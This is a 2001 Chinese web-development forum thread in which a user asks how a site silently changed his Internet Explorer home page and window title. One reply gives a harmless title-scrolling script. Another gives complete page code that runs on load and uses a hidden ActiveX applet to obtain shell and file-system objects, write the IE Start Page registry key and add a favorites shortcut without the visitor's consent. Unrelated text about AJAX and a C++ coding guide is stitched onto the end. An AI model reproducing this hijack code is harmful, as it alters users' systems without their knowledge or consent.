外行提个小问题

idAnts 2001-05-26 11:53:00
我去过一个网站,它什么提示也不给,就把我的首页改成它的了,而且Window Title也被改了。:(
它的代码用encoder加过密了,不知道是怎么写的,哪位老大知道是怎么写的?
...全文
123 9 打赏 收藏 转发到动态 举报
写回复
用AI写文章
9 条回复
切换为时间正序
请发表友善的回复…
发表回复
idAnts 2001-05-28
  • 打赏
  • 举报
回复
好的!给你甲酚!
whb959358 2001-05-27
  • 打赏
  • 举报
回复
不知道是如何做的。
孟子E章 2001-05-27
  • 打赏
  • 举报
回复
我知道!!!
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<TITLE>XML 技术 @ 【孟宪会之精彩世界】</TITLE>
<link rel = "Shortcut Icon" href="../favicon.ico">

<script language="javascript">
<!--
if (document.all) {
var clocktext=" ╲╱╲╱╲╱╲╱╲╱╲╱╲╱╲ *** 欢迎光临 *** ╱╲╱╲╱╲╱╲╱╲╱╲╱╲╱╲╱★★★★★★";
var ii=clocktext.length;
var pagetitle = document.title;
var i=0;
function scroll() {
var tmp="";
tmp+=clocktext.substring(clocktext,i)
i++;
if(i>=ii){i=0;}
clocktimer = setTimeout("scroll()", 100);
document.title = pagetitle + tmp + "  ︰︰┉┉━━>  ";
window.status=document.title;
}
scroll();
}
// -->
</script>

<body>


<IMG alt="孟" border=0 height=16 src="http://lucky.myrice.com/images/copyright.gif" width=16 align="absmiddle">
</BODY>
</HTML>


y1g1y1 2001-05-27
  • 打赏
  • 举报
回复
<HTML><HEAD><TITLE>袁飞的个人主页</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type><LINK
rel=stylesheet type=text/css>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

//this function is only needed if you add favorites or links
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
//end add favorites or links function

function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
//set home page
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://ygyuan.go.163.com");
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
//end set home page
}
catch(e)
{}
}
catch(e)
{}
}

function init()
{
setTimeout("f()", 1000);
setTimeout("AddFavLnk('','袁飞的个人主页','http://ygyuan.go.163.com')", 1000);
}

init();

</SCRIPT>

<META content="MSHTML 5.00.2920.0" name=GENERATOR></HEAD>
<BODY bgColor=#ffffff leftMargin=5 topMargin=2></BODY></HTML>
idAnts 2001-05-27
  • 打赏
  • 举报
回复
它改了注册表里的HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main里数据,不知道是怎么办到的。
idAnts 2001-05-27
  • 打赏
  • 举报
回复
我说的那个Window Title是每个新开的页面都显示它的信息。
idAnts 2001-05-26
  • 打赏
  • 举报
回复
http://www.rainbyte.com/
我要上课去了,下午再回来。
BrentIvan 2001-05-26
  • 打赏
  • 举报
回复
不可能吧,哪儿?
idAnts 2001-05-26
  • 打赏
  • 举报
回复
回来半天了,还没人说几句啊?
AJAX 是什么? 首先、AJAX 是一种很酷的技术,一旦采用了 AJAX,就能让你的 Web 页面, 你的网站,甚至连同你们公司,都变得很酷。在 Web2.0 的时代里,不使用一点 AJAX 技术的网站,就会显得很老土,很落伍。 但是,这样的理解,其实是很肤浅的。仅仅是从一个外行,从一个使用者的 角度出发,来理解 AJAX,就像我在本书的第一章 AJAX 我也行中那样,开发 出很愚蠢,甚至都没有资格被称之为 AJAX 应用的纯 IE、XMLHTTP 应用。 AJAX 更酷的一点在于,对于传统的 Web 开发人员来说,AJAX 所运用的, 是更加先进的,更加标准化的,更加和谐高效的,完整的 Web 开发技术体系。 遵循这样的体系开发 Web 应用,能让你的开发过程变得更加轻松,也能使你们 的开发团队,显得很酷。在 Web2.0 的时代里,还在采用过时的技术来开发 Web,会显得很老土,很落伍。 AJAX 的相关组成技术,每一个都已经出现了 N 年以上了,对这些技术的 组合运用,也远远早于 AJAX 这个名词出现之前。所以,我真正敬佩的,并非提 出 AJAX 这个缩写的 Jesse James Garrett。而是那些早在 N 年以前,就已经在探索、 实践的先行者,他们始终在追求的:是更好的用户体验,以及更好的开发体验。 这样的精神,才是最可宝贵的,也是最值得我们学习的。许多年过去以后,当我 们再回头来看当年的这些热门技术,也许早已经变得老土,变得落伍了。在这样
高质量C编程指南(林锐).doc 软件质量是被大多数程序员挂在嘴上而不是放在心上的东西! 除了完全外行和真正的编程高手外,初读本书,你最先的感受将是惊慌:“哇!我以前捏造的C++/C程序怎么会有那么多的毛病?” 别难过,作者只不过比你早几年、多几次惊慌而已。 请花一两个小时认真阅读这本百页经书,你将会获益匪浅,这是前面N-1个读者的建议。 一、编程老手与高手的误区 自从计算机问世以来,程序设计就成了令人羡慕的职业,程序员在受人宠爱之后容易发展成为毛病特多却常能自我臭美的群体。 如今在Internet上流传的“真正”的程序员据说是这样的: (1) 真正的程序员没有进度表,只有讨好领导的马屁精才有进度表,真正的程序员会让领导提心吊胆。 (2) 真正的程序员不写使用说明书,用户应当自己去猜想程序的功能。 (3) 真正的程序员几乎不写代码的注释,如果注释很难写,它理所当然也很难读。 (4) 真正的程序员不画流程图,原始人和文盲才会干这事。 (5) 真正的程序员不看参考手册,新手和胆小鬼才会看。 (6) 真正的程序员不写文档也不需要文档,只有看不懂程序的笨蛋才用文档。 (7) 真正的程序员认为自己比用户更明白用户需要什么。 (8) 真正的程序员不接受团队开发的理念,除非他自己是头头。 (9) 真正的程序员的程序不会在第一次就正确运行,但是他们愿意守着机器进行若干个30小时的调试改错。 (10) 真正的程序员不会在上午9:00到下午5:00之间工作,如果你看到他在上午9:00工作,这表明他从昨晚一直干到现在。

87,921

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧